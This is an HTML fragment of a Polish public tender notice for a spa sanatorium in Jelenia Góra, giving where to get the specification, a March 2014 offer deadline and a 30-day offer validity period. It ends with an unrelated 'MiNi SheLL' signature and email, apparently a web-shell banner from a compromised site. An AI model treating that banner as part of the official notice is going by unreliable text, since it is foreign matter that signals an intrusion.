<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sanatorium-agat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> nieodplatnie- ze strony internetowej; w wersji papierowej - w ciągu 5 dni od daty złożenia wniosku z dołączonym dowodem wpłaty 250 zł na konto Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.03.2014 godzina 10:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej Sanatorium Uzdrowiskowe MSW   AGAT,  ul. Cervi 14  58-560 Jelenia Góra lub bezpośrednio w sekretariacie - pokój nr 19 (adres jw.)w godz.urzędowania.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com